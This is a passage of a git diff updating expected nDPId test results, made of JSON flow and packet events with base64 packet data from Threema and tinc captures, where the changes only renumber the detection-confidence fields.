+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1655306704463,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655306704463,"pkt":"eJS0JASgYDjgxTWgCABFAAA0W4RAAD8Gd2zAqAJkuVjsbsYeFGbGZSTpLWF89IAQAVesGwAAAQEICgASf3F3Y\/lm"} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":67,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655304039977,"flow_last_seen":1655304045367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1655306704559,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50618,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":71,"source":"threema.pcap","alias":"nDPId-test","packets-captured":71,"packets-processed":70,"total-skipped-flows":0,"total-l4-payload-len":5631,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":5,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":31,"global_ts_msec":1655307958972} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655307958972,"flow_last_seen":1655307958972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655307958972,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50860,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1655307958972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655307958972,"pkt":"eJS0JASgYDjgxTWgCABFAAA80XZAAD8GAXLAqAJkuVjsbsasFGYhOI\/mAAAAAKAC\/\/\/0UwAAAgQFtAQCCAoAFl6QAAAAAAEDAwg="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1655307958996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655307958996,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxqxr+FC1ITiP56AS\/\/\/D1gAAAgQFrAEDAwYEAggK\/JV3MgAWXpA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1655307958999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655307958999,"pkt":"eJS0JASgYDjgxTWgCABFAAA00XdAAD8GAXnAqAJkuVjsbsasFGYhOI\/na\/hQtoAQAVfxOwAAAQEICgAWXpf8lXcy"} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":80,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1655306704436,"flow_last_seen":1655306777863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1655307959100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50718,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1655306704436,"flow_last_seen":1655306777863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1655307959100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50718,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":83,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655301424082,"flow_last_seen":1655301470813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":1567,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1655308018973,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50298,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":83,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655301591783,"flow_last_seen":1655301622013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":735,"flow_tot_l4_payload_len":2058,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1655308018973,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50484,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":83,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1655307958972,"flow_last_seen":1655308018973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1655308018973,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50860,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":83,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1655307958972,"flow_last_seen":1655308018973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1655308018973,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50860,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":83,"source":"threema.pcap","alias":"nDPId-test","packets-captured":83,"packets-processed":83,"total-skipped-flows":0,"total-l4-payload-len":6004,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":42,"global_ts_msec":1655308018973} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 83/83 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 6004 bytes +~~ total detected protocols..: 4 +~~ total active/idle flows...: 6/6 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6023072 bytes +~~ total memory freed........: 6023072 bytes +~~ total allocations/frees...: 120985/120985 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 463 chars +~~ json string max len.......: 690 chars +~~ json string avg len.......: 575 chars diff --git a/test/results/tinc.pcap.out b/test/results/tinc.pcap.out index 5188de152..a5d19a213 100644 --- a/test/results/tinc.pcap.out +++ b/test/results/tinc.pcap.out @@ -8,22 +8,22 @@ 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1495983427768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427768,"pkt":"ABcILL3nACbGCvpSCABFEAAovExAAEAGvyGDcqgbuVPacOds2We5l\/9BoNDrQlAQAOXp2wAA"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1495983427794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1495983427794,"pkt":"ACbGCvpSABcILL3nCABFCAA0AABAADEGimq5U9pwg3KoG9lowIoRT99iFi\/Q\/IASOQgE1gAAAgQFtAEBBAIBAwMH"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1495983427794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427794,"pkt":"ABcILL3nACbGCvpSCABFEAAok+pAAEAG54ODcqgbuVPacMCK2WgWL9D8EU\/fY1AQAOV9ywAA"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1495983427717,"flow_last_seen":1495983427818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2097,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1495983427818,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1495983427744,"flow_last_seen":1495983427846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2090,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1495983427846,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1495983427717,"flow_last_seen":1495983427818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2097,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1495983427818,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1495983427744,"flow_last_seen":1495983427846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2090,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1495983427846,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":200000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1495983428000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":686,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":686,"pkt_l4_len":652,"thread_ts_msec":1495983428000,"pkt":"ABcILL3nACbGCvpSCABFAAKgAABAAEARePuDcqgbuVPacNln2WcCjOIVMnicz9ZajjNEbdb6GxVP+T0CYtKzdvwcc\/GkysPu2p+HyRNKFCh5wNXMj6m9vaZ39wOg\/SFDxkblUqiUmI5T0t6KnEjzK4HfVELTk6MBki+YvI91VjjOz3oekNHxmSbldeRnnKPd925mZ9lxMA3GG9gZmsCSn4wPwr41LS70gLZbanbUNnlN7x6Kh9gVM6JtlzGBIjbSf6B4epOKePy2xW4AQp4bPXtTf\/0OGkPuy5hSETaSFX43lK3JOI2urGuq\/8zhvAyKL4t3LDJwEcTmglCiHm1tbrVnkmBCUBidOZ0NL52X+MKzyHnGOwdAwfV4+3VKFFmQE8IO6WWoZ\/vYOzfj1XZjyXREui0IMCYkWnraOSjlBBxRPQ4DkdgtsHokBlbzUjfr8Ss8XpNaUoZaaRCYy8Kw3szJstqYEU2GPLD0+pg+X9RZcEt+NlU1dFprcf5TwwLwxVrUXlq0UN21vjPNjBpnc4JeghgRv\/VcYRefFyhIUgPMVrdpg5GrCB4JTq65maVpsTyfybYsJ+i42aA3YjBU5z0PIhvBUxoHrj9TxX5OiZvAe42wvflGvW6iHzGGkgjUXDRxjS28FvW05QZJMaG4nQLQu0v8AHNHzQKZciwh33gMV3VVc\/5ghMO+CpJHRRkAZ7mBJzHMFXodcVJsk6K\/2J54sUaiJ48wBzCUQaWI9+w9ancXV2nZd+EHodY95wdzarfbqW8B30M66dRT3RsX8ddjytNxLuW+ewDpuzxP\/dncf+l0Gbul3BZMq9q4XnRT0wDb7bXlR0N7oHMRyWJ2GHC0RV7IQnYGzB\/YDI0StaWXOcSFic4ZA5TwYmSAm0iGFMYJM8DJznOohvp1QzM="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":200000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":200000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 01364{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1495983428000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":734,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":734,"pkt_l4_len":700,"thread_ts_msec":1495983428000,"pkt":"ABcILL3nACbGCvpSCABFAALQAABAAEAReMuDcqgbuVPacNln2WcCvOcuvywVtuwFGBCYss6acsiJNNNiAbBIlKDNCK44gk8rPgtBTYPcB0TBQaeKKWA+4iZhbEKh+1udHAv6t2B1Yn6IJMtYq5DM3X4M272sdmCIguJEDbWnC1eertoAJ\/nCld7bT5YQq8t1ppSFEJgecf3feprazQpcAFso0UkuKa+f8uN2aRv39oQ84yMBNBDhwVJ0a0nVOlZ6yZDSD51mMG4JoLiN6RWJXjcVqxy8m9jXpG1c+xsS0O6vC2KUMrKi+v7l2G+JsqarL4sHxppbbBoKMn1G6jriIHVF2byGLSZ00B3htFsVVj1wv1QBh8gghmipFPjUm\/aeSaE+oJUPKU+sp7Dg6Xva6c8vbo3TtJqvjKV8ke6QyQ7aGh5wPiN9\/a7xgRazNtYiEGk2\/mB4tPUVqvmOMmFqyRUy5E54tmImaZBxLH6d0RcjOcdr5cOGQQBnbEVGuWb70eAFXbxU9GwFaLQbsB4ixO+0UXLmZZZSFjcwzL0p2ByLphsBC+0r5HUR+xSSVPlg1gpXDvLAqvPafPWGz0oEsVqgZuuOxAECfRwfFUitnotekdgFMlckueO6aNw3gcrUrWq8lluC226td1YzzuWc1bztMEO46Nwl29tlwW+n4BfE8Ks4iF0RmPeruypgNVfy8UHTu26YFArxZ++\/ysArMEP2WLqaUMI6M\/jOSF4Hmz4MDlNkXALZoCcota0mysF7b9UawKat33S4Mn95EjfrH9sP42bJhKBoemGSQoufnGy397VEaJIbjn0C4TMCdTSxnPB2Kbauhcj5J9SFESxhfdT1dCI+XOZyD+qGea1LaaQlTKnH9E\/\/jMJNmp50jvcNxKjRrVFwHpWvyCjkeewfQ5cMV0LYN7Zr0J8LPcmGWZ6HVdR8joEBR5VzTkpA484re9kkh3rmNHcG6eXJdcA="} 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1495983428027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1495983428027,"pkt":"ACbGCvpSABcILL3nCABFCADgAABAADERibO5U9pwg3KoG9ln2WcAzPGuM9Lx5\/tPdTG2m3Y0AlyEq2mnzqyIMEs7w8HRBEl8Y5NuT+Tl6VzNZm9syhOM8O5X9DMCZ2i18aEY5\/AFa+9vGaBzFiMm9BvXYzjoD8NIhl92KAV3hQzzPzdUGmBVVMf0BbRkDSRCiFN9nGpFLBN+y4nOpA3kBUeSofHjZl9gZY\/0gSr+qv0Gl1ZSJf+LLeeMJpEC6tb9XeO6w6224M34GMTZTkD7Nv+SCyj6hVz9obZb5coivi5CEA1BAiI84UNSuifu9w=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428043,"flow_last_seen":1495983428043,"flow_idle_time":200000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":724,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1495983428043,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1495983428043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":766,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":766,"pkt_l4_len":732,"thread_ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCALwAABAADERh6O5U9pwg3KoG9lo2WgC3AOYwHfE3coRkd9vFWAurZs8jstTwnXw\/cqsx5iKbKA7woGOpEZiStAKTCSRoKp6x6\/f9Zs+BpTFgPOcyy5YAMcbffaGjwWOnT8IyeKE5n34quupOTS2uuRjCtyNCFAo8WTnSMzbi32PyJcywIUxEUQ8liTYbPgKdwTgaiP\/Hotm1mtwLDTs7hG08UqSbcXCWXNFFVPEK47MaPqwoPn2dh7mqibglI+NUfYKog17NTDVZj+waYLvcDN9j2XoImkNzUjCipW9K3ac4j70R5PFggHU36XlCSNZ2XhIjFKM00nQGI+QLoteQ8j0aZAsrLXLYsxqqK4SvGoYgma1olbSPh2W15iEFnVNfCrkhO342UfUtRpoqO2eSyqwBMxkb1F3H2m0kYUJQotA5znx3A5M2I2cLV97Zq1M5s2yfOsVLnemh3YMo8DmxGOnynqe4PdTcIIYCFlTuvlbJxcoz46oqoG4DHCRlF0dlntPGix0TitI5D\/n0YiE5bQQUU7gqIMYrd\/038O+j7JziwNwLqI9ZUNuZRL5RgmChAbYY5TtTaE7r+CtYmugTK7qdhtdAytq+kIRcuZJxzW2e+QHOyzQjzCE7aIMnqFyw73cJLJvOafzGqDIWsdusVXsa7JkhE0L2HSLACJvLruZU6SO95zxggRtnzTruoO2bZQpKHl56KP7dWrprSH\/BtWoA8QYIMdKrZ11e6dVhhfntSzlJ7oOBRzS82PQtcxITPaQUBY7kloV6nEsD123\/RYWvYnnlopmrLjY88pZllsFaRoYa+q+rxj125r8cCXiXcb20crMWSrxvWF5gSaLraJg0iySCfa0N+9TIxFXdaISLPrnQJf+KFNsm71eDJSNCihlQD114v9gJdrqDDh2zOpIECten2AFkK5gz9Y9P\/m15B6u92mwRdXwhBzI10R26F6x1VA2OCcHHQ90EjxcfGr9C9BCt8qY+zJFJYvpTw=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428043,"flow_last_seen":1495983428043,"flow_idle_time":200000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":724,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1495983428043,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428043,"flow_last_seen":1495983428043,"flow_idle_time":200000,"flow_min_l4_payload_len":724,"flow_max_l4_payload_len":724,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1495983428043,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 02392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1495983428043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCAXAAABAADERhNO5U9pwg3KoG9lo2WgFrCCQQfVUKnrm4XUK3wfxxn8qlQ5ZlUxAsin94OmtvvCqeiNDv9hCgysXgIe\/Jwp6foEgyUgSLwbFE+jFX5EiTbzvLxw+eE+9kkIbIypcFMAA862am\/h5EhYX9oyZgZit\/ohLFdBZAd\/9piW+TIg1JYKUHUk24mSNhkzehqNGbaa8v1XNXvCAKUf+je80JL2ztiSjDNtOMrbTSNyuOyDQhbbpaRAakKCJ88rhmRVZWPpGUvSoCLUQLdy+ls4UP9VbLIv60yNlhG\/tIZF+Y9AgYJgNK7469NXCZUoHPgebmwGoSIBvEupGZ2HWMq5tD1YtSNLd5mdcZ4U6bdW57PJT8Mqpobu5nNKCEUTKU8fv54QllT27onCmdTrjSLU7i56qGCPKz8Pmgpd+4MU1sOXlteqk11G5kxvUePU9AHDMWVZcDsBw+8w6+Ab\/JxYo4ilYPsOkX7nL+VL0USjj5AuG8wFeeDnvZeQURQeN12MuZewRpRzkJa5jIqIQqHHvEIR3I+NlcYV0IJXsrpavQ6RSGtYmR7+94hoEShFxTK6D2mPtrdLiAqRfmJptPiSWLm5Mqo0iayfkgY6sd6M1vwIpwRPc0qQOtn1doDjup9IIauyzdANQF9x2voU4Z8dsvHyVyVE9VF\/Qdb\/Bbe15\/vrLpOF+cB00\/TXrJ07AVZHqEwel\/iScs2S9kgqiIjzb1T0G6y8xlHQV7ktrErMlC4GXnRqlxWayYa4G266nN6wc0wTy9MD7G5DpqxUPZwZIrxZiMHXc4mPXA210XTsNG7LVVQM581lStiGr1a4pUZOImjoO\/gk5frgMuu6jHFgEA+vJuy5sW5lQpb37IXQqFXKKxN2z8Ke+x4zy7ALHVigelzuNCf3HZfol1uD4eeP+2tpVITMiH4O5PCcLDMT1yYFhbvLg8pREkBITQB+rUBzFhHXEVteh6noPH6hIRkDIrLyfEHdswFs6MATwSlSxKkz0QuaSV8BEXCeHOM+JmmNRCgSmcHuzwrDdDGG7eSF7kzVOXV4KPQtBdbB4rq\/rFfGJFSiBXn2huFIeNdQhj4gFtDQIfYjXMsmhSsrScwjLj7C7jg2Rwm\/XuhfLgws3rBZC6s4ClAl8Lku7gDzAWOdYgK2FafJmEnZR3NXAFEI8JF5r5ITwwBATJADMcv7GO51VLOgFAuacu5w0kk1gxapzbHcSOdPeKJB+9voPecizTzqOKMuqIngnpb\/qfLXWqnLz7U6\/\/ui4aHgWF+lKp0xsjiPYD9YnVxF